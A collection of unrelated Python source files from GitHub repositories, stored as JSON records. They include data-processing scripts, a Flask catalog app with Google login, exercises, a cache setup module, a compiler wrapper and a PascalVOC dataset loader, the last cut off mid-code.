+{"seq_id":"22775519141","text":"import multiprocessing as mp\nimport pandas as pd\nimport locale\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).resolve().parent.parent))\n\nfrom src.api import get_audio_metadata\nfrom src.data import coalesce_columns\nfrom tqdm.contrib.concurrent import process_map # multiprocessing from tqdm\n\nlocale.setlocale(locale.LC_ALL, \"sv_SE.UTF-8\") # Swedish date format\n\ndf = pd.read_parquet(\"data/df_anforanden_metadata.parquet\")\ndf = df[~pd.isna(df[\"rel_dok_id\"])].reset_index(drop=True)\n\n# Some anforanden have multiple rel_dok_ids, we select the first one\nfirst_rel_dok_id = df[df[\"rel_dok_id\"].str.contains(\",\")][\"rel_dok_id\"].str.extract(\"(.*?)(?=, )\")\ndf.loc[df[\"rel_dok_id\"].str.contains(\",\"), \"rel_dok_id\"] = first_rel_dok_id.iloc[:, 0].tolist()\n\n# Downlaod audio metadata from unique rel_dok_ids (debates)\ndf_list = process_map(\n get_audio_metadata,\n df[\"rel_dok_id\"].unique().tolist(),\n max_workers=mp.cpu_count(),\n chunksize=20,\n)\n\ndf_audiometa = pd.concat(df_list, axis=0)\ndf_audiometa = df_audiometa.reset_index(drop=True)\ndf_audiometa[\"debatedate\"] = pd.to_datetime(df_audiometa[\"debatedate\"], format=\"%d %B %Y\")\ndf_audiometa.loc[df_audiometa[\"anftext\"] == \"\", \"anftext\"] = None\n\n# # Add direct timestamped link to webb-tv to start video where a speech begins\n# df_audiometa[\"debateurl_timestamp\"] = (\n# \"https://www.riksdagen.se/views/pages/embedpage.aspx?did=\"\n# + df_audiometa[\"dokid\"]\n# + \"&start=\"\n# + df_audiometa[\"start\"].astype(str)\n# + \"&end=\"\n# + (df_audiometa[\"start\"] + df_audiometa[\"duration\"]).astype(str)\n# )\n\n\n# Some speech texts are missing from audio metadata, we add them from df_anforanden_metadata\ndf_audiometa = df_audiometa.rename(columns={\"number\": \"anforande_nummer\"})\n\ndf_audiometa = df_audiometa.merge(\n df[[\"rel_dok_id\", \"anforande_nummer\", \"anforandetext\", \"talare\", \"intressent_id\"]],\n left_on=[\"rel_dok_id\", \"anforande_nummer\"],\n right_on=[\"rel_dok_id\", \"anforande_nummer\"],\n how=\"left\",\n)\n\n# Uppercase all names/party names because they are inconsistent in the data\ndf_audiometa[\"text\"] = df_audiometa[\"text\"].str.upper()\ndf_audiometa[\"talare\"] = df_audiometa[\"talare\"].str.upper()\n\n# Replace NaN in anftext column with text from anforandetext\ndf_audiometa = coalesce_columns(df_audiometa, col1=\"anftext\", col2=\"anforandetext\")\n# Drop any duplicates\ndf_audiometa = df_audiometa[~df_audiometa.duplicated(keep=\"first\")].reset_index(drop=True)\n# Drop speeches with no text\ndf_audiometa = df_audiometa[~df_audiometa[\"anftext\"].isna()].reset_index(drop=True)\n\ndf_audiometa.to_parquet(\"data/df_audio_metadata.parquet\", index=False)\n","repo_name":"kb-labb/riksdagen_anforanden","sub_path":"scripts/download_audio_metadata.py","file_name":"download_audio_metadata.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"4199086520","text":"import win32com.client\nimport sys\n\ndef write_to_access(final):\n #数据库名和表名\n db_name=\"./第1套-庄老师.mdb\"\n tb_name=\"第1套-庄\"\n #连接数据库\n conn = win32com.client.gencache.EnsureDispatch('ADODB.Connection') \n DSN = 'PROVIDER = Microsoft.ACE.OLEDB.12.0;DATA SOURCE =%s;' %(db_name)\n conn.Open(DSN)\n #数据库表访问\n rs = win32com.client.Dispatch(r'ADODB.Recordset') \n rs.Open('[' + tb_name + ']', conn, 1, 3) # 不允许更新,用于查询\n \n\n #查询与更新 \n rs.MoveFirst()\n idx=0\n while True:\n if rs.EOF:\n break\n else:\n idx+=1\n sid=rs.Fields.Item(0).Value\n if sid in final:\n rs.Fields.Item(7).Value=final[sid][2]\n rs.Fields.Item(8).Value=final[sid][3]\n rs.Fields.Item(9).Value=final[sid][0]\n rs.Fields.Item(10).Value=final[sid][1]\n rs.Update()\n rs.MoveNext()\n else:\n print(\"erro!\\n\")\n sys.exit(0) \n \ndef getDict():\n rst={}\n f=open(\"log.txt\",\"r\")\n for line in f:\n x=line.split(\" \")\n sid = x[0]\n prob = x[1]\n score= int(float(x[2]))\n if sid not in rst:\n rst[sid]=[]\n rst[sid].append(score) \n f.close()\n return rst\n \nfinal=getDict()\nwrite_to_access(final) ","repo_name":"mrlantin/others","sub_path":"VB作业/期末考试/ac.py","file_name":"ac.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31981255788","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.readlines()[1]\n\nsetup(name='seqlearner',\n version='0.0.7',\n description='The multitask learning package for semi-supervised learning on biological sequences',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/EliHei/SeqLearner',\n author='Elyas Heidari, Mohsen Naghipourfar',\n author_email='almasmadani@gmail.com, mn7697np@gmail.com',\n license='MIT',\n packages=find_packages(),\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n )\n","repo_name":"EliHei/SeqLearn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"32705366221","text":"#!/usr/bin/python3.6\nimport json\nimport random\nimport requests\nimport string\nimport httplib2\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for, flash, make_response\nfrom oauth2client.client import flow_from_clientsecrets, FlowExchangeError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Base, User, Categories, Items\nfrom flask import session as login_session\n\napp = Flask(__name__)\n# Read secret json file for access account\nCLIENT_ID = json.loads(open('catalog_secret.json', 'r').read())[\n 'web']['client_id']\nprint(\"Client id :{}\".format(CLIENT_ID))\n# implement database connection\nengine = create_engine(\"sqlite:///catalogApp.db\")\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# ======================JSON==============================\n@app.route('/categories/json')\ndef all_categories_json():\n cates = session.query(Categories).all()\n categories_json = [cate.serialize for cate in cates]\n for category in categories_json:\n items = session.query(Items).filter_by(cate_id=category['id']).all()\n items_json = [item.serialize for item in items]\n if items_json:\n category['items'] = items_json\n return jsonify(categories_json)\n\n\n# ========================================================\n@app.route('/')\n@app.route('/catalog')\ndef all_catalog():\n categories = session.query(Categories).all()\n items = session.query(Items).all()\n return render_template('catalog.html', categories=categories, items=items)\n\n\n@app.route('/catalog//items')\ndef items_per_category(category_name):\n categories = session.query(Categories).all()\n category = session.query(Categories).filter_by(name=category_name).one()\n print(category.name)\n if category:\n items = session.query(Items).filter_by(cate_id=category.id).all()\n print([item.name for item in items])\n return render_template('items_per_catalog.html',\n categories=categories,\n selected_category=category,\n items=items)\n\n\n@app.route('/catalog//')\ndef item_description(category_name, item_name):\n category = session.query(Categories).filter_by(name=category_name).first()\n print(category_name)\n if category:\n item = session.query(Items).filter_by(\n cate_id=category.id, name=item_name).first()\n if item:\n return render_template('item_description.html', category=category, item=item)\n else:\n return \"No description for this item\"\n else:\n return \"we can't find your category\"\n\n\n# worked and need to add login session\n@app.route('/catalog/new_item', methods=['GET', 'POST'])\ndef add_new_item():\n categories = session.query(Categories).all()\n if 'username' not in login_session:\n return redirect('/login')\n if request.method == \"POST\":\n new_item = Items(cate_id=request.form['category_id'],\n name=request.form['title'],\n description=request.form['description'])\n session.add(new_item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"add_item.html\", categories=categories)\n\n\n# worked and need to add login session and form\n@app.route('/catalog///edit', methods=['GET', 'POST'])\ndef update_item(category_name, item_name):\n allCategory = session.query(Categories).all()\n category = session.query(Categories).filter_by(name=category_name).one()\n if 'username' not in login_session:\n return redirect('/login')\n item = session.query(Items).filter_by(\n cate_id=category.id, name=item_name).one()\n print(item.name, item.description)\n if request.method == \"POST\":\n if category.user_id !=login_session['user_id']:\n return \"\"\n else:\n if request.form['title']:\n item.name = request.form['title']\n if request.form['description']:\n item.description = request.form['description']\n if request.form['category_id']:\n item.cate_id = request.form['category_id']\n session.add(item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"edit_item.html\", item=item, categories=allCategory)\n\n\n@app.route('/catalog///delete', methods=['GET', 'POST'])\ndef delete_item(category_name, item_name):\n category = session.query(Categories).filter_by(name=category_name).one()\n item = session.query(Items).filter_by(cate_id=category.id, name=item_name).one()\n if 'username' not in login_session:\n return redirect('/login')\n if request.method == \"POST\":\n if category.user_id !=login_session['user_id']:\n return \"\"\n else:\n session.delete(item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"delete_item.html\", item=item)\n \n\n\n# =========================================================\n@app.route('/login')\ndef show_login():\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n login_session['state'] = state\n print(\"login session : {}\".format(login_session['state']))\n return render_template(\"login.html\", STATE=state)\n\n\ndef get_user_id(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\ndef get_user_info(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef create_user(loginsession):\n newUser = User(name=loginsession['username'],\n email=loginsession['email'],\n )\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=loginsession['email']).one()\n return user.id\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Validate state token\n print(\"Resquest args:\", request.args.get('state'))\n print(\"login session :\", login_session['state'])\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('catalog_secret.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(json.dumps(\n 'Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n print(\"access token:\", access_token)\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token={}'.format(access_token))\n print(\"url :\", url)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n print(\"gplus :\", gplus_id)\n if result['user_id'] != gplus_id:\n response = make_response(json.dumps(\n \"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(json.dumps(\n \"Token's client ID does not match app's.\"), 401)\n print(\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps(\n 'Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n login_session['provider'] = 'google'\n login_session['username'] = data['name']\n login_session['email'] = data['email']\n user_id = get_user_id(login_session['email'])\n if not user_id:\n user_id = create_user(login_session)\n login_session['user_id'] = user_id\n\n output = ''\n output += 'Welcome, '\n output += login_session['username']\n output += '! '\n flash(\"you are now logged in as %s\" % login_session['username'])\n print(\"done!\")\n return output\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n if access_token is None:\n response = make_response(json.dumps(\n 'Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % login_session['access_token']\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n response = make_response(json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return redirect(url_for('all_catalog'))\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\nif __name__ == \"__main__\":\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='localhost', port=5000)\n","repo_name":"AhmedMohamedTalaat/Catalog-App","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71660980390","text":"# Ref: http://www.petercollingridge.co.uk/tools/drawsvgpy/\n# \nimport drawSvg as draw\n\nd = draw.Drawing(200, 100, origin='center')\n\nd.append(draw.Lines(-80, -45,\n 70, -49,\n 95, 49,\n -90, 40,\n close=False,\n fill='#eeee00',\n stroke='black'))\n\nd.append(draw.Rectangle(0,0,40,50, fill='#1248ff'))\nd.append(draw.Circle(-40, -10, 30,\n fill='red', stroke_width=2, stroke='black'))\n\np = draw.Path(stroke_width=2, stroke='green',\n fill='black', fill_opacity=0.5)\np.M(-30,5) # Start path at point (-30, 5)\np.l(60,30) # Draw line to (60, 30)\np.h(-70) # Draw horizontal line to x=-70\np.Z() # Draw line to start\nd.append(p)\n\nd.append(draw.ArcLine(60,-20,20,60,270,\n stroke='red', stroke_width=5, fill='red', fill_opacity=0.2))\nd.append(draw.Arc(60,-20,20,60,270,cw=False,\n stroke='green', stroke_width=3, fill='none'))\nd.append(draw.Arc(60,-20,20,270,60,cw=True,\n stroke='blue', stroke_width=1, fill='black', fill_opacity=0.3))\n\nd.setPixelScale(2) # Set number of pixels per geometry unit\n#d.setRenderSize(400,200) # Alternative to setPixelScale\nd.saveSvg('example.svg')\nd.savePng('example.png')\n\n# Display in iPython notebook\nd.rasterize() # Display as PNG\nprint(d) # Display as SVG\n","repo_name":"yogeshhk/MidcurveNN","sub_path":"References/code/reference_drawSvg_test.py","file_name":"reference_drawSvg_test.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"71"}
+{"seq_id":"38739767896","text":"#!/usr/bin/env python\n\nfrom array import array\nimport os\nimport Adafruit_BMP.BMP085 as BMP085\n\ndir_name = os.path.dirname(os.path.realpath(__file__)) + '/data/'\n\ndef get_data():\n sensor = BMP085.BMP085(mode=BMP085.BMP085_ULTRAHIGHRES)\n temperature = sensor.read_temperature()\n pressure = sensor.read_pressure() / 100.0 # conversion to hPa\n return temperature, pressure\n\ndef write_value_to_file(file_name, value):\n with open(file_name, 'ab') as file:\n float_array = array('d', [value])\n float_array.tofile(file)\n\nif __name__ == '__main__':\n temp, pressure = get_data()\n write_value_to_file(dir_name + 'temp.bin', temp)\n write_value_to_file(dir_name + 'pressure.bin', pressure)\n\n","repo_name":"daunator/pressurelogwithupload","sub_path":"gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74610133030","text":"print(\"\"\"\r\n1'den 1000'e kadar olan sayılardan mükemmel sayı olanları ekrana yazdırın. Bunun için bir sayının mükemmel olup olmadığını\r\n dönen bir tane fonksiyon yazın.\r\n\r\nBir sayının bölenlerinin toplamı kendine eşitse bu sayı mükemmel bir sayıdır. Örnek olarak 6 mükemmel bir sayıdır (1 + 2 + 3 = 6).\r\nÇIKIŞ İÇİN q YA BASIN!!!\r\n\"\"\")\r\n\r\ndef mukemmel_Sayı(sayı):\r\n toplam = 0\r\n for i in range(1,sayı):\r\n if(sayı%i==0):\r\n toplam+=i\r\n if(toplam==sayı):\r\n return True\r\n else:\r\n return False\r\n\r\nwhile True:\r\n sayı=input(\"Sayı giriniz:\")\r\n if (sayı == \"q\"):\r\n print(\"Çıkış yapıldı..\")\r\n break\r\n else:\r\n sayı = int(sayı)\r\n print(mukemmel_Sayı(sayı))","repo_name":"EbruSomuncu/Python","sub_path":"Bölüm4/Fonksiyonlar/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24584460663","text":"from typing import List\nimport collections\n\nclass Solution:\n def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:\n groups = collections.defaultdict(list)\n res = []\n\n for i, size in enumerate(groupSizes):\n groups[size].append(i)\n \n for size in groups:\n res.extend(groups[size][i: i + size] for i in range(0, len(groups[size]), size))\n \n return res\n\n\ndef main():\n sol = Solution()\n print(sol.groupThePeople([3,3,3,3,3,1,3]))\n print(sol.groupThePeople([2,1,3,3,3,2]))\n\nif __name__ == '__main__':\n main()","repo_name":"brandoneng000/LeetCode","sub_path":"medium/1282.py","file_name":"1282.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"28871691109","text":"from inspect import iscoroutinefunction\nfrom typing import List\n\nfrom fastack import Fastack\nfrom fastack.utils import import_attr\nfrom starlette.datastructures import State\n\nfrom fastack_cache.backends.base import BaseCacheBackend\nfrom fastack_cache.backends.dummy import DummyBackend\nfrom fastack_cache.serializers.base import BaseSerializer\n\n\ndef setup(app: Fastack):\n def on_startup():\n caches = {}\n caches_settings = getattr(app.state.settings, \"CACHES\", {})\n for name, cache_config in caches_settings.items():\n serializer_settings = cache_config.get(\"SERIALIZER\", {})\n serializer_class = serializer_settings.get(\n \"CLASS\", \"fastack_cache.serializers.PickleSerializer\"\n )\n serializer_options = serializer_settings.get(\"OPTIONS\", {})\n try:\n serializer_class: BaseSerializer = import_attr(serializer_class)\n except ImportError as e:\n raise ImportError(\n f\"Could not import serializer class {serializer_class}\"\n ) from e\n\n serializer = serializer_class(\n serializer_options.get(\"DUMPS\", {}),\n serializer_options.get(\"LOADS\", {}),\n )\n backend = cache_config.get(\"BACKEND\")\n if not backend:\n raise RuntimeError('No backend specified for cache \"{}\"'.format(name))\n\n try:\n backend = import_attr(backend)\n except ImportError as e:\n raise RuntimeError(\n 'Could not import cache backend \"{}\"'.format(backend)\n ) from e\n\n options = cache_config.get(\"OPTIONS\", {})\n backend = backend(serializer, **options)\n caches[name] = backend\n\n app.state.caches = State(caches)\n default_cache = caches.get(\"default\")\n if not default_cache:\n default_cache = DummyBackend(None)\n\n app.state.cache = default_cache\n\n async def on_shutdown():\n caches: List[BaseCacheBackend] = app.state.caches._state.values()\n for cache in caches:\n method = cache.disconnect\n if iscoroutinefunction(method):\n await method()\n else:\n method()\n\n app.add_event_handler(\"startup\", on_startup)\n app.add_event_handler(\"shutdown\", on_shutdown)\n","repo_name":"fastack-dev/fastack-cache","sub_path":"fastack_cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4125412709","text":"import logging\nimport sys\nimport uuid\n\nimport trio\nimport zmq\nimport zmq.asyncio\nfrom network.beacon import Beacon\nfrom network.utils import get_ip\n\nimport clover_swarm.containers as containers\n\n# from clover_swarm import error\n\n# from clover_swarm.containers import AgentContainer\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG)\n\n\n# class ConnectedPeer:\n# expires_at = None\n#\n# def __init__(self, uuid):\n# self.addr = None\n# self.uuid = uuid\n# self.heartbeat = None\n# self.dealer = None\n#\n# def is_alive(self):\n# \"\"\"\n# Resets the peers expiry time\n# \"\"\"\n# self.expires_at = time.time() + 5\n\n\nclass Agent:\n def __init__(self, port: int = None, name: str = None, beacon=Beacon, ctx=None):\n\n self.port = port\n self.host = None\n self.uuid = uuid.uuid4()\n self.name = name or self.uuid.hex[:8]\n\n self.running = False\n self.start_stop_lock = trio.Lock()\n\n self.ctx = ctx or zmq.Context.instance()\n self.beacon = beacon(self)\n # self.router =\n self.peers = {}\n\n def __str__(self):\n return f\"\"\n\n def __hash__(self):\n return hash(self.uuid)\n\n async def start(self):\n async with self.start_stop_lock:\n if self.running:\n raise RuntimeError(\"Agent already running\")\n logger.debug(f\"Starting {self}\")\n\n self.host = await get_ip()\n await self.beacon.start()\n\n logger.info(f\"Started {self}\")\n\n async def stop(self):\n logger.debug(f\"Stopping {self}\")\n\n logger.info(f\"Stopped {self}\")\n\n async def start_beacon(self):\n logger.debug(f\"Starting beacon of {self}\")\n\n async def stop_beacon(self):\n logger.debug(f\"Stopping beacon of {self}\")\n\n\nif __name__ == \"__main__\":\n container = containers.AgentContainer()\n container.wire(modules=[sys.modules[__name__]])\n\n agent = container.agent()\n trio.run(agent.start)\n","repo_name":"artem30801/clover-swarm","sub_path":"clover_swarm/network/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22034060902","text":"import os\nimport subprocess\nimport io\nimport re\nimport shutil\n\nfrom tools.logger import init_console_logger\n\nTHIS_PATH = os.path.abspath(os.path.dirname(__file__))\nCRAM_DIR_PATH = os.path.abspath(os.path.join(THIS_PATH, \"..\", \"CRAM\"))\nCOMPILE_BAT_PATH = os.path.abspath(os.path.join(THIS_PATH, \"compile.bat\"))\n\n\ndef cosmic_compile(c_file_path, logger=init_console_logger(name=\"cosmic_compile\")):\n \"\"\"\n Compiles using the cosmic compiler.\n \"\"\"\n # checks\n assert(os.path.isfile(c_file_path))\n assert(\".c\" == c_file_path[-2:])\n logger.info(\"Compiling...\")\n\n # clean old header files\n logger.info(\"Cleaning old header files...\")\n previous_h_files = [_ for _ in os.listdir(CRAM_DIR_PATH) if _[-2:] == \".h\"]\n for f in previous_h_files:\n try:\n os.remove(os.path.join(CRAM_DIR_PATH, f))\n except Exception as e:\n logger.warning(\"Failed to clean old header files: '{}' could not be deleted: {}\".format(f, e))\n\n # collect source header files\n with open(c_file_path, \"r\") as f:\n lines = f.read()\n local_includes = re.findall(r\"#include\\s{0,1}\\\".+[^\\s]\\\"\", lines)\n h_filenames = [_[8:].replace('\"', '').replace(' ', '') for _ in local_includes]\n\n # copy source header files\n source_dir_path = os.path.join(os.path.dirname(c_file_path))\n for h_filename in h_filenames:\n src = os.path.join(source_dir_path, h_filename)\n dst = os.path.join(CRAM_DIR_PATH, h_filename)\n try:\n logger.info(\"Copying header file '{}' to '{}' ...\".format(src, dst))\n shutil.copyfile(src, dst)\n except IOError as e:\n logger.error(\"Header file '{}' was not found. Compilation failed. Error message: {}\".format(h_filename, e))\n logger.error(\"Compilation failed\")\n return\n\n # compile\n command = r'\"{}\" \"{}\" \"{}\"'.format(COMPILE_BAT_PATH, CRAM_DIR_PATH, c_file_path)\n logger.debug(\"Executing command: {}\".format(command))\n p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n std_reader = io.TextIOWrapper(p.stdout, encoding='utf8')\n err_reader = io.TextIOWrapper(p.stderr, encoding='utf8')\n\n while True:\n # read outputs\n s_out = std_reader.readline().rstrip()\n e_out = err_reader.readline().rstrip()\n\n # output std output text\n if s_out != '':\n logger.info(s_out)\n\n # error occurred\n elif e_out != '':\n # output entire error then return 1\n while e_out != '':\n logger.error(e_out)\n e_out = err_reader.readline().rstrip()\n logger.error(\"Compilation failed\")\n return 1\n\n # process finished\n elif p.poll() is not None:\n logger.info(\"Compilation successful\")\n return 0\n\n\nif __name__ == \"__main__\":\n exit(cram_compile(os.path.abspath(os.path.join(THIS_PATH, \"..\", \"CRAM\", \"blank.c\"))))\n","repo_name":"dev-chip/EasyBoard","sub_path":"program_files/core/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35040611709","text":"'''\n可序列化的数据类型\nnumber\nstr\nlist\ntuple\n** dict\n'''\n'''\njson模块\n 参数名 参数 介绍 举例 返回值\n dumps obj 对象序列化 json.dumps([1,2]) json字符串\n loads str 反序列化 json.loads('[1,2]') 原始数据类型\n'''\n'''\npickle模块\n方法名 参数 介绍 举例 返回值\ndumps obj 对象序列化 pickle.dumps([1,2]) 比特\nloads byte 反序列化 pickle.loads('[1,2,3]') 原始数据类型\n'''\nimport json\ndef read(path):\n with open(path,'r') as f:\n data = f.read()\n return json.loads(data)\n\ndef write(path,data):\n with open(path,'w',encoding='utf-8') as f:\n if isinstance(data,dict):\n _data = json.dumps(data)\n f.write(_data)\n else:\n raise TypeError('data is not dict')\n return True\n\ndata = {'name':'曾丽文','age':18}\nif __name__ == '__main__':\n write('test.json',data)\n data = read('test.json')\n print(data)","repo_name":"zlw1115/Python_Program","sub_path":"12文件操作/03序列化.py","file_name":"03序列化.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19437863978","text":"import requests\nfrom selenium import webdriver\nimport time\n\nurl = 'http://192.168.0.1'\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'ecos_pw=1qw:language=cn; bLanguage=cn',\n 'DNT': '1',\n 'Host': '192.168.0.1',\n 'If-Modified-Since': 'Thu Jan 01 00:00:00 1970',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36'\n}\n\ndrive = webdriver.Chrome()\ndrive.get(url)\ntime.sleep(5)\nprint(drive.find_element_by_id('statusWanIP'))\ntime.sleep(10)\ndrive.quit()\na = requests.get(url, headers=headers)\na.encoding = a.apparent_encoding\nprint(a.text)","repo_name":"TanMengyuan/web_spider","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4661696490","text":"import argparse\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nfrom transforms import get_transforms\nfrom utils import utils\n\n\nclass PascalVOC(Dataset):\n def __init__(self, dir_root: Path, transform=None ):\n\n dir_img = dir_root / Path(\"VOCdevkit/VOC2007/JPEGImages\")\n dir_label = dir_root / Path(\"VOCdevkit/VOC2007/Annotations\")\n self.list_imgs = self.get_image_list(dir_img)\n self.list_labels = self.get_label_list(dir_label)\n num_imgs = len(self.list_imgs)\n num_labels = len(self.list_labels)\n if num_imgs != num_labels:\n raise ValueError(f\"Num of images ({num_imgs}) is not equal to num of labels ({num_labels}) \"\n f\"in dataset.\\n dir_img: {dir_img}\\ndir_label: {dir_label}\")\n\n self.transform = transform\n self.class_dict_reverse = {\n 0: \"background\",\n 1: \"aeroplane\",\n 2: \"bicycle\",\n 3: \"bird\",\n 4: \"boat\",\n 5: \"bottle\",\n 6: \"bus\",\n 7: \"car\",\n 8: \"cat\",\n 9: \"chair\",\n 10: \"cow\",\n 11: \"diningtable\",\n 12: \"dog\",\n 13: \"horse\",\n 14: \"motorbike\",\n 15: \"person\",\n 16: \"pottedplant\",\n 17: \"sheep\",\n 18: \"sofa\",\n 19: \"train\",\n 20: \"tvmonitor\"\n }\n\n self.class_dict = {\n \"background\": 0,\n \"aeroplane\": 1,\n \"bicycle\": 2,\n \"bird\": 3,\n \"boat\": 4,\n \"bottle\": 5,\n \"bus\": 6,\n \"car\": 7,\n \"cat\": 8,\n \"chair\": 9,\n \"cow\": 10,\n \"diningtable\": 11,\n \"dog\": 12,\n \"horse\": 13,\n \"motorbike\": 14,\n \"person\": 15,\n \"pottedplant\": 16,\n \"sheep\": 17,\n \"sofa\": 18,\n \"train\": 19,\n \"tvmonitor\": 20\n }\n\n def __len__(self):\n return len(self.list_labels)\n\n def __getitem__(self, index):\n \"\"\"Return image, label\n Args:\n index: index of img/label to extract\n\n Returns:\n Tensor: image. Shape=[H, W, 3]\n Tensor: label. Shape=[N, 5] (cls_id, x, y, w, h). Bounding boxes in format x,y,w,h in relative coords.\n\n Notes:\n The collate fn converts label to [N, 6] shape, by concatenating all the labels along the 0th axis. It also\n adds a new element to 1st axis, for image id. The image id is used to select the labels that belong to a\n particular image.\n \"\"\"\n f_img = self.list_imgs[index]\n img = cv2.imread(str(f_img))\n img_numpy = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n f_label = self.list_labels[index]\n label = self.read_label(f_label)\n label_numpy = np.array(label, dtype=np.float32)\n\n if self.transform is not None:\n try:\n image, bb_target = self.transform((img_numpy, label_numpy))\n 